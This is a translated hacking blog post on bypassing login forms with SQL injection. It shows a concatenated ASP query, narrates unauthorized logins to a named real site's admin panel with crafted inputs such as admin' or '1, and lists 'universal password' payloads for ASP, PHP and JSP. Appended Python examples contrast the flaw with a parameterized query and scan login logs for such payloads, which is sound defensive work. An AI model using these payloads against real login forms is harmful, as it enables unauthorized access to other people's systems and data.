<%
pwd = Request.Form("password")    ' take the submitted password and store it in pwd
user = Request.Form("username")   ' take the submitted username and store it in user
Set conn = Server.CreateObject("ADODB.Connection")   ' create the database connection object
sql = "SELECT * FROM admin WHERE username='" & user & "' AND password='" & pwd & "'"   ' build the query by string concatenation: the user input lands inside the SQL text
........
No need to write out the rest.
Let's look at the cause of the vulnerability.
For example, when we first enter admin/admin888 in the backend login form, check.asp receives (assuming no MD5 hashing):
user=admin, pwd=admin888
The query is then: SELECT * FROM admin WHERE username='admin' AND password='admin888'
If the admin table has a record whose username field is admin and whose password field is admin888, the login succeeds and the user's session is set.
But what happens when we log in with the universal password ' or '=' or ' as both username and password?
user=' or '=' or ', pwd=' or '=' or '
The query becomes: SELECT * FROM admin WHERE username=' or '=' or ' AND password=' or '=' or '
(For readability I added spaces.)
This means: select the rows where (the username is empty, or the empty string equals the empty string, which is true) and (the password is empty, or the empty string equals the empty string, which is also true).
The username part is joined with or, so it evaluates to true; the password part is also true; joining the two with and is of course true, so the check is bypassed!
That is the core of the principle! >_<
Of course there are many kinds of universal password; I won't go into them here.
Using them flexibly is what matters most!
Let's look at a practical example.
A few days ago my friend Little Tree came across a site (http://www.czdh.com.cn/manage/login.asp) where you could log in with the universal password ' or '=' or '. The backend had a database backup function, but unfortunately there was no permission to use it. Strange!
Normally, logging in with ' or '=' or ' gives you the admin identity, but here it gave only an ordinary administrator!
Actually there is nothing odd about it! As we just said, if the universal password succeeds, that is because the query checks records in order, starting from the first one. Since the condition is always true, it returns the first record, right?
Unfortunately, in this administrator table the first record is an ordinary administrator!
What a tragedy!
The privileges were really limited: there seemed to be no upload permission either. Tragic! Of course, there were some ideas.
For example: if there is an injection point, you could get the administrator's username and password (MD5-hashed, which adds difficulty and may not be crackable), then log in to the backend with the universal password and modify the cookie, hehe! Needless to say, that spoof could succeed!
The reason is certain: capture the packets and analyze them and you'll see it!
Another tragedy: no injection point was found!
Well, there seemed to be no way!
Oh!
I kept thinking: how could I log in successfully with the universal password and have the identity be admin?
For both username and password I entered: admin' or '='
The error was as follows:
Syntax error (operator missing) in query expression 'adminname='admin' or '=' and adminpass='915c991fe2863ae671cb4f5066dad485'
Hey, so that's how it is!
It's just a syntax error, but it gives us a clue!
Look at the content of the error message; I won't analyze it further. We suspect that if the user admin exists and we construct a syntactically correct statement, we can log in as admin?
Oh, sure enough!
Username and password: admin' or '1
Hey! Login succeeded, and the user is admin!
Oh! Flexible use is the key!
Of course, following this idea, it's obvious that we can construct a login for any existing user and log in successfully!
See, getting a shell really isn't that easy! Hey!
Reference URL: http://www.douban.com/note/148789639/
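The following is an added example, not code from the post or the site it describes. It puts the concatenated query of check.asp beside its parameterized form and runs both against a constructed two-row admin table (an ordinary administrator first, then admin) in SQLite, which stands in for the Access database the post describes. It covers both the "first record comes back" principle explained above and the later admin' or '1 walkthrough: the vulnerable form returns the first row for a tautology, returns the admin row for the targeted form, and raises a syntax error for admin' or '=', while the parameterized form returns nothing for all three. The table, its rows and the SQLite stand-in are assumptions of this example; the exact ' or '=' or ' string depends on how Access/Jet evaluates a string literal in a boolean position and SQLite treats a non-numeric string as false there, so the tautology case uses the ' OR '1'='1 form from the PHP list further down.

```python
import sqlite3

# Constructed sample data for this example (not from the page): an admin table
# whose FIRST record is an ordinary administrator and whose second is "admin".
# Passwords are stored in plain text, matching the page's "no MD5" assumption.
SAMPLE_ADMINS = [
    ("editor", "editor123", "normal"),
    ("admin", "admin888", "super"),
]


def make_db():
    """Build an in-memory SQLite database holding the constructed admin table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE admin (id INTEGER PRIMARY KEY, username TEXT, "
        "password TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO admin (username, password, role) VALUES (?, ?, ?)",
        SAMPLE_ADMINS,
    )
    conn.commit()
    return conn


def vulnerable_login(conn, user, pwd):
    """Same construction as the page's check.asp: the SQL text is assembled by
    string concatenation, so a quote in the input ends the literal early and
    the rest of the input is parsed as SQL."""
    sql = ("SELECT username, role FROM admin WHERE username='" + user
           + "' AND password='" + pwd + "'")
    try:
        return conn.execute(sql).fetchone()  # first matching row, like the page
    except sqlite3.Error as exc:
        # The page's "admin' or '='" attempt lands here: a syntax error whose
        # message echoes the query shape back to whoever submitted the form.
        return ("SQL error", str(exc))


def safe_login(conn, user, pwd):
    """Hardened form: a parameterized query. The driver passes user and pwd as
    data bound to the ? placeholders, so they can never alter the SQL text."""
    sql = "SELECT username, role FROM admin WHERE username=? AND password=?"
    return conn.execute(sql, (user, pwd)).fetchone()


def compare(user, pwd):
    """Return (vulnerable_result, safe_result) for one submitted pair."""
    conn = make_db()
    try:
        return vulnerable_login(conn, user, pwd), safe_login(conn, user, pwd)
    finally:
        conn.close()


if __name__ == "__main__":
    attempts = [
        ("admin", "admin888"),          # genuine credentials
        ("something", "' OR '1'='1"),   # tautology in the password field
        ("admin' or '1", "whatever"),   # the page's targeted form: any existing user
        ("admin' or '='", "whatever"),  # the page's first attempt: broken syntax
    ]
    for user, pwd in attempts:
        vuln, safe = compare(user, pwd)
        print(f"{user!r:>18} / {pwd!r:<14} vulnerable={vuln!r:<30} safe={safe!r}")
```

One point the post's "(username part) and (password part)" reading glosses over: AND binds tighter than OR, so the tautology case actually parses as (username='something' AND password='') OR '1'='1'. The result is the same, every row matches and the first record comes back, which is exactly why the friend's login landed on the ordinary administrator. The parameterized query fixes the root cause; hashing the password, as the target site did, does not, because the username field was still concatenated.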
ASP/ASPX universal passwords
1: "or"a"="a
2: ') or ('a'='a
3: or 1=1--
4: ' or 1=1--
5: a' or '1=1--
6: "or 1=1--
7: ' or 'a'='a
8: "or"="a'='a"
9: ' or '='
10: ' or '=' or '
11: 1 or '1'='1'=1
12: 1 or '1'='1' or 1=1
13: ' OR 1=1%00
14: "or 1=1%00
15: ' XOR
16: New universal login password
Username: ' UNION SELECT 1,1,1 FROM admin WHERE '=' (replace admin with the actual table name)
Password: 1
USERNAME=-1%CF' UNION SELECT 1,1,1 AS password,1,1,1%23
Password=1
17: admin' or 'a'='a, with any password
PHP universal passwords
' or '=' or '
' or 1=1/* (string type; whether it can be used depends on whether GPC is on)
User: something
Pass: ' OR '1'='1
JSP universal passwords
1' or '1'='1
admin' OR 1=1/*
Username: admin (when the system has this user)
Password: 1' or '1'='1
Reference URL: http://www.douban.com/note/168041331/
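As an added example from the defender's side, not part of either referenced note: the lists above share one shape, a quote that closes the string literal followed by or/xor/union or a trailing comment or NUL terminator, and that shape is easy to flag in a backend login log. The log format, the entries and the source addresses below are constructed for this example, and the two regexes are a heuristic, so a name like O'Brien is deliberately not flagged on the quote alone.

```python
import re

# Constructed backend login log for this example (not from the page). Each
# entry records the submitted username; IPs are documentation addresses.
SAMPLE_LOG = """\
2011-03-01T09:12:03 ip=203.0.113.5 user="admin" result=failure
2011-03-01T09:12:41 ip=203.0.113.5 user="admin' or '='" result=error
2011-03-01T09:13:10 ip=203.0.113.5 user="admin' or '1" result=success
2011-03-01T09:14:02 ip=198.51.100.7 user="O'Brien" result=success
2011-03-01T09:15:30 ip=198.51.100.9 user="' UNION SELECT 1,1,1 FROM admin WHERE '='" result=failure
2011-03-01T09:16:12 ip=198.51.100.9 user="editor" result=success
"""

LOG_RE = re.compile(r'ip=(?P<ip>\S+) user="(?P<user>.*)" result=(?P<result>\w+)$')

# A quote is what breaks out of the string literal in every payload on the
# page; on its own it is common in legitimate names, so it is only counted
# together with a boolean/UNION keyword or a trailing comment/NUL terminator.
KEYWORD = re.compile(r"\b(or|xor|union)\b", re.I)
TERMINATOR = re.compile(r"(--|/\*|#|%23|%00)\s*$")


def is_suspicious(value):
    """Heuristic flag for login-field input shaped like the page's payloads."""
    has_quote = "'" in value or '"' in value
    return has_quote and (KEYWORD.search(value) is not None
                          or TERMINATOR.search(value) is not None)


def scan_log(text):
    """Return (ip, user, result) for entries whose username looks injected.
    A 'success' on such an entry is a likely bypass; an 'error' shows the
    application echoing SQL errors back to the client, as in the post."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.search(line)
        if m and is_suspicious(m.group("user")):
            hits.append((m.group("ip"), m.group("user"), m.group("result")))
    return hits


def ips_to_review(text):
    """Sorted list of source addresses with at least one suspicious entry."""
    return sorted({ip for ip, _, _ in scan_log(text)})


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("%-14s %-8s %r" % (hit[0], hit[2], hit[1]))
    print("review:", ips_to_review(SAMPLE_LOG))
```

Flagging is for triage, not prevention: a login handler that still concatenates input into SQL is vulnerable whether or not the attempt is logged, and a password field is just as injectable as the username field. Parameterized queries, as in the earlier example, remove the class of problem; this scan tells you where to look afterwards.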
Website Login hack